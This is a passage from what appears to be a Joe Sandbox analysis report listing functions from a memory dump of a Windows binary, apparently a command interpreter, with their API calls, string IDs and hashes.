                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcsrchr$wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 110935159-0
                                                                                          • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                          • Instruction ID: e5fab3fd3caa073cc9d4cb668299ca2f2758648ae8c8891b4c8d3f38b9030635
                                                                                          • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                          • Instruction Fuzzy Hash: 1951B072B0B683A5FE319B11A8047F9A291BB49BA4F184534CE5E8B785DF3CE546A300
                                                                                          Function 00007FF6A0E85EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                          • String ID:
                                                                                          • API String ID: 1403193329-0
                                                                                          • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                          • Instruction ID: d2a51a360fa4b86f2939bfb556c3012587543bc9dc4d31c1a05038be9518c96e
                                                                                          • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                          • Instruction Fuzzy Hash: 9E51A036A0B683A5EB359F20D9046BA77A0FF49799F458135DA0E87794EF3CD548A300
                                                                                          Function 00007FF6A0E791C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00007FF6A0E7921C
                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E793AA
                                                                                            • Part of subcall function 00007FF6A0E78B20: wcsrchr.MSVCRT ref: 00007FF6A0E78BAB
                                                                                            • Part of subcall function 00007FF6A0E78B20: _wcsicmp.MSVCRT ref: 00007FF6A0E78BD4
                                                                                            • Part of subcall function 00007FF6A0E78B20: _wcsicmp.MSVCRT ref: 00007FF6A0E78BF2
                                                                                            • Part of subcall function 00007FF6A0E78B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E78C16
                                                                                            • Part of subcall function 00007FF6A0E78B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E78C2F
                                                                                            • Part of subcall function 00007FF6A0E78B20: wcschr.MSVCRT ref: 00007FF6A0E78CB3
                                                                                            • Part of subcall function 00007FF6A0E8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E841AD
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE ref: 00007FF6A0E830DD
                                                                                            • Part of subcall function 00007FF6A0E83060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E830F6
                                                                                            • Part of subcall function 00007FF6A0E83060: SetErrorMode.KERNELBASE ref: 00007FF6A0E83106
                                                                                          • wcsrchr.MSVCRT ref: 00007FF6A0E792D8
                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E79362
                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6A0E79373
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3966000956-0
                                                                                          • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                          • Instruction ID: ccd7cafef9c02098fd72ad3f03de88393f2d586589c48a52a10c5fc60daa8822
                                                                                          • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                          • Instruction Fuzzy Hash: 7151A132A0B783AAEB619F21D8502B973A4FF49B94F144035DA4D87B96DF3CE555E300
                                                                                          Function 00007FF6A0E72A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_setjmp
                                                                                          • String ID:
                                                                                          • API String ID: 3883041866-0
                                                                                          • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                          • Instruction ID: 0d8a7926be7279bdd5d7f1818692bd8a66d0eab3a288a87ff977f10a7a513f45
                                                                                          • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                          • Instruction Fuzzy Hash: 04516D32A0AB869AEB61CF21D8403E977A4FB49748F444139EA4D8BB49DF3CD645DB00
                                                                                          Function 00007FF6A0E7B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E7B4BD
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E7B518
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E7B58B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                          • String ID: ELSE$IF/?
                                                                                          • API String ID: 3223794493-1134991328
                                                                                          • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                          • Instruction ID: 6d07e5ec26f0e948247bc3f55be31a62e5124243e07994cfb08cd53f3b3c0eaa
                                                                                          • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                          • Instruction Fuzzy Hash: 0E415A72E0F643A2FB549B64A4113B927A2BF85740F588039D64EC7397EF3CE845A340
                                                                                          Function 00007FF6A0E9E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                          • String ID:
                                                                                          • API String ID: 1532185241-0
                                                                                          • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                          • Instruction ID: 3b5fb246aafcf3f61f998673f239f40e879a90f0fdccec95e182c7277ad6c4ba
                                                                                          • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                          • Instruction Fuzzy Hash: 2B411532A06753ABE7649B31E44567DBAA1FB88B80F558535EB1A83791CF3CE841D700
                                                                                          Function 00007FF6A0E74FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 3588551418-0
                                                                                          • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                          • Instruction ID: f59d6fff6fe63e695b56413f9c5fd94fe306411c974648683793462d2176acd6
                                                                                          • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                          • Instruction Fuzzy Hash: C9417132E0A643EBE7549B51A48427DB661FF85B81F148039D64EC7792CF7CE841A740
                                                                                          Function 00007FF6A0E9E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                          • String ID:
                                                                                          • API String ID: 2123716050-0
                                                                                          • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                          • Instruction ID: 3b92ce1e7ea0f2dc4bc367535446947fa65de45b2aeed9ec81226022f30a6b59
                                                                                          • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                          • Instruction Fuzzy Hash: 7B41903270ABC29AEB718F25D8503E967A4FB49B8DF044134DB4D8AB99DF3CD2499700
                                                                                          Function 00007FF6A0E765F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                          • String ID:
                                                                                          • API String ID: 3114114779-0
                                                                                          • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                          • Instruction ID: 4863d05a9c0cb4b22135a9edc6520b25f37b698ba00d273919510669793c5822
                                                                                          • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                          • Instruction Fuzzy Hash: C4411632A0AB42AAE7008F65E8802AD77A5FB88748F554136EA0D93B55DF38E416D740
                                                                                          Function 00007FF6A0E9A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A77A
                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A7AF
                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A80E
                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A839
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A850
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2240656346-0
                                                                                          • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                          • Instruction ID: c995cc6922be9bdc76b5add062665ee536c2f3cf7e2195d10b5f337c70460c61
                                                                                          • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                          • Instruction Fuzzy Hash: 00317032A1AA43A6E7608F25E44457AB7F4FF8C790F684135EA4E82764DF3CD8519B40
                                                                                          Function 00007FF6A0E9D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E801B8: _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
                                                                                            • Part of subcall function 00007FF6A0E801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E9D0F9
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6A0E9D10F
                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6A0E9D166
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E9D17A
                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6A0E9D18C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 3008996577-0
                                                                                          • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                          • Instruction ID: 3aca63f90eeb57fde47cb60b04b3804da2edcefeeee7647ba401823d9c944c49
                                                                                          • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                          • Instruction Fuzzy Hash: 50216936B19A52DAF7009BB1E8000BD7BB0FB8DB45B545125EE1D93B98EF38D044DB14
                                                                                          Function 00007FF6A0E95770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateSemaphore
                                                                                          • String ID: _p0$wil
                                                                                          • API String ID: 1078844751-1814513734
                                                                                          • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                          • Instruction ID: 4b2cb0489550b5f13a7f75a44fc25666fd3243cb131acce95cce7968bfc3bfae
                                                                                          • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                          • Instruction Fuzzy Hash: 8451E473F1B783A6EE659F5494542B9A2A0FF84BD0F644435DA4E87784DF3CE505A300
                                                                                          Function 00007FF6A0E9B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF6A0E9B934
                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6A0E85085), ref: 00007FF6A0E9B9A5
                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6A0E85085), ref: 00007FF6A0E9B9F7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                          • String ID: %WINDOWS_COPYRIGHT%
                                                                                          • API String ID: 1103618819-1745581171
                                                                                          • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                          • Instruction ID: 685569fe205fe695aa1d66e422621a6f4e95e5fc90555fa8586c6f9233bda1fc
                                                                                          • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                          • Instruction Fuzzy Hash: 4541AD72A1A783A2EA108F1595102B9B3B0FB99BD1F958235DF9D83395EF3CE481D300
                                                                                          Function 00007FF6A0EA0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
